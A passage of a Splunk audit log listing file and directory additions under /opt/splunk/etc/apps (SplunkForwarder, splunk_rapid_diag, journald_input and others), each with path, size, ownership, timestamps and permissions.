17:42:39.307, user=n/a, action=add,path="/opt/splunk/etc/apps/user-prefs/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.302, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/default/README", isdir=0, size=196, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.297, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/metadata/local.meta", isdir=0, size=836, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:39.292, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/metadata/default.meta", isdir=0, size=501, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.286, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/local/props.conf", isdir=0, size=940, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:42:39.282, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.276, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:42:39.272, user=n/a, action=add,path="/opt/splunk/etc/apps/learned/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.268, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/default/inputs.conf", isdir=0, size=243, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.264, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/default/authorize.conf", isdir=0, size=84, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.160, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/README/inputs.conf.spec", isdir=0, size=2895, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.154, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/bin/splunk-journald.path", isdir=0, size=48, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.151, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/bin/journald.sh", isdir=0, size=5194, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.146, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.142, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.139, user=n/a, action=add,path="/opt/splunk/etc/apps/journald_input/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.135, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_internal_metrics/default/transforms.conf", isdir=0, size=3973, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.132, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_internal_metrics/default/props.conf", isdir=0, size=2323, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.129, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_internal_metrics/default/app.conf", isdir=0, size=256, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.125, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_internal_metrics/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:39.122, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default/server.conf", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.117, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default/outputs.conf", isdir=0, size=215, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.112, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default/health.conf", isdir=0, size=68, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.106, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default/default-mode.conf", isdir=0, size=169, gid=41812, uid=41812, modtime="Sat May 1 18:26:50 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:39.101, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default/app.conf", isdir=0, size=57, gid=41812, uid=41812, modtime="Sat May 1 18:26:49 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.996, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/metadata/default.meta", isdir=0, size=206, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.992, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.987, user=n/a, action=add,path="/opt/splunk/etc/apps/SplunkForwarder/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:20 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.983, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/templates/task_template_wizard.html", isdir=0, size=1084, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.979, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/templates/task_manager.html", isdir=0, size=995, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.976, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/templates/reference_guide.html", isdir=0, size=995, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.972, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/templates/data_collection.html", isdir=0, size=1085, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.868, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages/vendor.0.js", isdir=0, size=1885731, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.862, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages/task_template_wizard.js", isdir=0, size=304344, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.857, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages/task_manager.js", isdir=0, size=67716, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.853, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages/reference_guide.js", isdir=0, size=33334, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.847, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages/data_collection.js", isdir=0, size=242556, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:32 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.836, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.831, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.826, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/manager/rapid_diag.xml", isdir=0, size=479, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.821, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/nav/default.xml", isdir=0, size=170, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.817, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/views/task_template_wizard.xml", isdir=0, size=146, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.813, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/views/task_manager.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.809, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/views/reference_guide.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/views/data_collection.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.699, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.695, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.691, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui/manager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.687, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.683, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/web.conf", isdir=0, size=876, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.679, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/savedsearches.conf", isdir=0, size=2990, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.676, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/restmap.conf", isdir=0, size=5399, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.672, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/rapid_diag.conf", isdir=0, size=308, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.668, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/props.conf", isdir=0, size=433, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.664, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.660, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/default/app.conf", isdir=0, size=458, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.555, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/metadata/default.meta", isdir=0, size=107, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/README/rapid_diag.conf.spec", isdir=0, size=3363, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.546, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/wlm-issues.json", isdir=0, size=682, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/strace-main.json", isdir=0, size=1151, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.535, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/slowsearch-1.json", isdir=0, size=3365, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.529, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/slave-issues.json", isdir=0, size=1291, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.523, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/search-head-connectivity.json", isdir=0, size=1032, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.517, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/search-head-cluster-issues.json", isdir=0, size=1264, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.512, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/scheduler-issues.json", isdir=0, size=1290, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.506, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/reader-issues.json", isdir=0, size=1729, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.500, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/pstacks-main.json", isdir=0, size=1549, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.496, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/netstats-main.json", isdir=0, size=875, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.492, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/iops-main.json", isdir=0, size=681, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.489, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/indexer-issues.json", isdir=0, size=2365, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/data-transmit-issues.json", isdir=0, size=1699, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/SampleTasks/data-issues.json", isdir=0, size=2532, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:16 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.378, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/validators.py", isdir=0, size=11746, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/streaming_command.py", isdir=0, size=6498, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.366, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/search_command.py", isdir=0, size=38925, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.362, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/reporting_command.py", isdir=0, size=9700, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.358, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/internals.py", isdir=0, size=27972, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.354, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/generating_command.py", isdir=0, size=17262, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.350, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/external_search_command.py", isdir=0, size=7872, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.347, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/eventing_command.py", isdir=0, size=5152, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.342, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/environment.py", isdir=0, size=4683, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/decorators.py", isdir=0, size=15728, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.334, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands/__init__.py", isdir=0, size=6037, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.230, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/validation_definition.py", isdir=0, size=2775, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.226, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/utils.py", isdir=0, size=2642, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.222, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/script.py", isdir=0, size=6641, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.217, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/scheme.py", isdir=0, size=3073, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.212, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/input_definition.py", isdir=0, size=1888, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.208, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/event_writer.py", isdir=0, size=2790, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.203, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/event.py", isdir=0, size=4272, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.199, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/argument.py", isdir=0, size=4219, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.195, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput/__init__.py", isdir=0, size=400, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/six.py", isdir=0, size=30098, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.083, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/searchcommands", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/results.py", isdir=0, size=10820, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.072, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/ordereddict.py", isdir=0, size=4223, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.068, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/modularinput", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:38.063, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/data.py", isdir=0, size=8528, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.059, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/client.py", isdir=0, size=143076, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.055, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/binding.py", isdir=0, size=57303, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:38.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/splunklib/__init__.py", isdir=0, size=772, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/util.py", isdir=0, size=2965, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.937, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/gencache.py", isdir=0, size=23790, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.933, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/dynamic.py", isdir=0, size=22152, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.929, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/build.py", isdir=0, size=23522, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.925, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/__init__.py", isdir=0, size=22632, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.921, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client/CLSIDToClass.py", isdir=0, size=1705, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.917, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/client", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Mar 11 04:41:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:37.913, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/__init__.py", isdir=0, size=4299, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.909, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/win32com/License.txt", isdir=0, size=1548, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.805, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/cli/rapid_diag_cli.py", isdir=0, size=18990, gid=41812, uid=41812, modtime="Thu Mar 11 04:20:17 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:37.800, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_rapid_diag/bin/cli/cli_error_code.py", isdir=0, 